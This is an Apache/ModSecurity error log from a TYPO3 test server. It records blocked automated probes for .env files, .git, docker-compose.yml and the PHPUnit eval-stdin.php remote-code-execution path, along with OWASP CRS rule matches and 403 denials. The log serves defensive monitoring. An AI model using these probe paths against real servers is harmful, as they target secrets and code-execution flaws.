[Wed Jul 30 18:17:23.878310 2025] [:error] [pid 1567421] [client 217.217.252.19:57084] [client 217.217.252.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIpFky_7ckd4YAu8yBhneQAAAAc"]
[Wed Jul 30 18:17:23.878550 2025] [:error] [pid 1567421] [client 217.217.252.19:57084] [client 217.217.252.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIpFky_7ckd4YAu8yBhneQAAAAc"]
[Wed Jul 30 18:17:24.580193 2025] [:error] [pid 1572606] [client 217.217.252.19:57244] [client 217.217.252.19] ModSecurity: Warning. Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "177"] [id "920170"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFlPVy0Jq6c4BDC1WHGwAAAAo"]
[Wed Jul 30 18:17:24.580265 2025] [:error] [pid 1572606] [client 217.217.252.19:57244] [client 217.217.252.19] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFlPVy0Jq6c4BDC1WHGwAAAAo"]
[Wed Jul 30 18:17:24.580680 2025] [:error] [pid 1572606] [client 217.217.252.19:57244] [client 217.217.252.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 7)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFlPVy0Jq6c4BDC1WHGwAAAAo"]
[Wed Jul 30 18:17:24.580864 2025] [:error] [pid 1572606] [client 217.217.252.19:57244] [client 217.217.252.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 7 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 7, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFlPVy0Jq6c4BDC1WHGwAAAAo"]
[Wed Jul 30 18:17:29.529862 2025] [:error] [pid 1576478] [client 217.217.252.19:58213] [client 217.217.252.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIpFmXbSAIfJKpkX1PudfQAAAAg"]
[Wed Jul 30 18:17:29.530113 2025] [:error] [pid 1576478] [client 217.217.252.19:58213] [client 217.217.252.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIpFmXbSAIfJKpkX1PudfQAAAAg"]
[Wed Jul 30 18:17:29.530300 2025] [:error] [pid 1576478] [client 217.217.252.19:58213] [client 217.217.252.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIpFmXbSAIfJKpkX1PudfQAAAAg"]
[Wed Jul 30 18:17:30.829505 2025] [:error] [pid 1576484] [client 217.217.252.19:58476] [client 217.217.252.19] ModSecurity: Warning. Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "177"] [id "920170"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFmgSAY3qBIoISB5HW5QAAAA8"]
[Wed Jul 30 18:17:30.829575 2025] [:error] [pid 1576484] [client 217.217.252.19:58476] [client 217.217.252.19] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFmgSAY3qBIoISB5HW5QAAAA8"]
[Wed Jul 30 18:17:30.829992 2025] [:error] [pid 1576484] [client 217.217.252.19:58476] [client 217.217.252.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 7)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFmgSAY3qBIoISB5HW5QAAAA8"]
[Wed Jul 30 18:17:30.830205 2025] [:error] [pid 1576484] [client 217.217.252.19:58476] [client 217.217.252.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 7 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 7, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIpFmgSAY3qBIoISB5HW5QAAAA8"]
[Thu Jul 31 10:36:14.508217 2025] [:error] [pid 1592565] [client 3.146.111.124:35758] [client 3.146.111.124] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aIsq_hTbwDTjy7t9G4WXlAAAAA4"]
[Thu Jul 31 10:36:14.509579 2025] [:error] [pid 1592565] [client 3.146.111.124:35758] [client 3.146.111.124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aIsq_hTbwDTjy7t9G4WXlAAAAA4"]
[Thu Jul 31 10:36:14.509794 2025] [:error] [pid 1592565] [client 3.146.111.124:35758] [client 3.146.111.124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aIsq_hTbwDTjy7t9G4WXlAAAAA4"]
[Fri Aug 01 10:06:29.122403 2025] [:error] [pid 1621764] [client 147.93.157.77:62848] [client 147.93.157.77] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIx1hbNpojkABpnXA_ivYQAAAAI"]
[Fri Aug 01 10:06:29.122683 2025] [:error] [pid 1621764] [client 147.93.157.77:62848] [client 147.93.157.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIx1hbNpojkABpnXA_ivYQAAAAI"]
[Fri Aug 01 10:06:29.122885 2025] [:error] [pid 1621764] [client 147.93.157.77:62848] [client 147.93.157.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIx1hbNpojkABpnXA_ivYQAAAAI"]
[Fri Aug 01 10:06:30.086690 2025] [:error] [pid 1621765] [client 147.93.157.77:62984] [client 147.93.157.77] ModSecurity: Warning. Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "177"] [id "920170"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIx1hv8CICd_KOc8QdlyrgAAAAM"]
[Fri Aug 01 10:06:30.086794 2025] [:error] [pid 1621765] [client 147.93.157.77:62984] [client 147.93.157.77] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIx1hv8CICd_KOc8QdlyrgAAAAM"]
[Fri Aug 01 10:06:30.087233 2025] [:error] [pid 1621765] [client 147.93.157.77:62984] [client 147.93.157.77] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 7)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIx1hv8CICd_KOc8QdlyrgAAAAM"]
[Fri Aug 01 10:06:30.087472 2025] [:error] [pid 1621765] [client 147.93.157.77:62984] [client 147.93.157.77] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 7 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 7, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIx1hv8CICd_KOc8QdlyrgAAAAM"]
[Fri Aug 01 17:52:01.652961 2025] [:error] [pid 1616111] [client 217.217.252.19:56766] [client 217.217.252.19] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIzioZqyKb3R124GcYNZlgAAAAY"]
[Fri Aug 01 17:52:01.653221 2025] [:error] [pid 1616111] [client 217.217.252.19:56766] [client 217.217.252.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIzioZqyKb3R124GcYNZlgAAAAY"]
[Fri Aug 01 17:52:01.653419 2025] [:error] [pid 1616111] [client 217.217.252.19:56766] [client 217.217.252.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aIzioZqyKb3R124GcYNZlgAAAAY"]
[Fri Aug 01 17:52:03.093130 2025] [:error] [pid 1621764] [client 217.217.252.19:56901] [client 217.217.252.19] ModSecurity: Warning. Match of "rx ^0?$" against "REQUEST_HEADERS:Content-Length" required. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "177"] [id "920170"] [msg "GET or HEAD Request with Body Content."] [data "19"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [tag "CAPEC-272"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIzio7NpojkABpnXA_ivgwAAAAI"]
[Fri Aug 01 17:52:03.093201 2025] [:error] [pid 1621764] [client 217.217.252.19:56901] [client 217.217.252.19] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "662"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIzio7NpojkABpnXA_ivgwAAAAI"]
[Fri Aug 01 17:52:03.093573 2025] [:error] [pid 1621764] [client 217.217.252.19:56901] [client 217.217.252.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 7)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIzio7NpojkABpnXA_ivgwAAAAI"]
[Fri Aug 01 17:52:03.093752 2025] [:error] [pid 1621764] [client 217.217.252.19:56901] [client 217.217.252.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 7 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 7, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "aIzio7NpojkABpnXA_ivgwAAAAI"]
[Tue Aug 05 07:02:22.156406 2025] [authz_core:error] [pid 1715286] [client 165.227.173.41:33618] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/server-status
[Tue Aug 05 07:02:22.505325 2025] [:error] [pid 1720187] [client 165.227.173.41:33646] [client 165.227.173.41] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJGQXoT2dZ5PqApOWJqJmAAAAAw"]
[Tue Aug 05 07:02:22.505586 2025] [:error] [pid 1720187] [client 165.227.173.41:33646] [client 165.227.173.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJGQXoT2dZ5PqApOWJqJmAAAAAw"]
[Tue Aug 05 07:02:22.505778 2025] [:error] [pid 1720187] [client 165.227.173.41:33646] [client 165.227.173.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aJGQXoT2dZ5PqApOWJqJmAAAAAw"]
[Tue Aug 05 07:02:22.574524 2025] [:error] [pid 1715288] [client 165.227.173.41:33656] [client 165.227.173.41] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJGQXgj3mBFGz3mBFY-5qwAAAAM"]
[Tue Aug 05 07:02:22.574754 2025] [:error] [pid 1715288] [client 165.227.173.41:33656] [client 165.227.173.41] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJGQXgj3mBFGz3mBFY-5qwAAAAM"]
[Tue Aug 05 07:02:22.574928 2025] [:error] [pid 1715288] [client 165.227.173.41:33656] [client 165.227.173.41] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJGQXgj3mBFGz3mBFY-5qwAAAAM"]
[Tue Aug 05 07:02:22.636819 2025] [authz_core:error] [pid 1720185] [client 165.227.173.41:33664] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Aug 05 07:02:34.247438 2025] [authz_core:error] [pid 1715288] [client 93.123.109.64:53358] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Tue Aug 05 16:45:23.335468 2025] [:error] [pid 1724073] [client 213.232.87.232:24827] [client 213.232.87.232] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJIZAz230dNCddo5vZBiBAAAAAA"]
[Tue Aug 05 16:45:23.335676 2025] [:error] [pid 1724073] [client 213.232.87.232:24827] [client 213.232.87.232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJIZAz230dNCddo5vZBiBAAAAAA"]
[Tue Aug 05 16:45:23.335865 2025] [:error] [pid 1724073] [client 213.232.87.232:24827] [client 213.232.87.232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJIZAz230dNCddo5vZBiBAAAAAA"]
[Tue Aug 05 16:45:23.336548 2025] [authz_core:error] [pid 1726073] [client 213.232.87.232:17569] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/docker-compose.yml
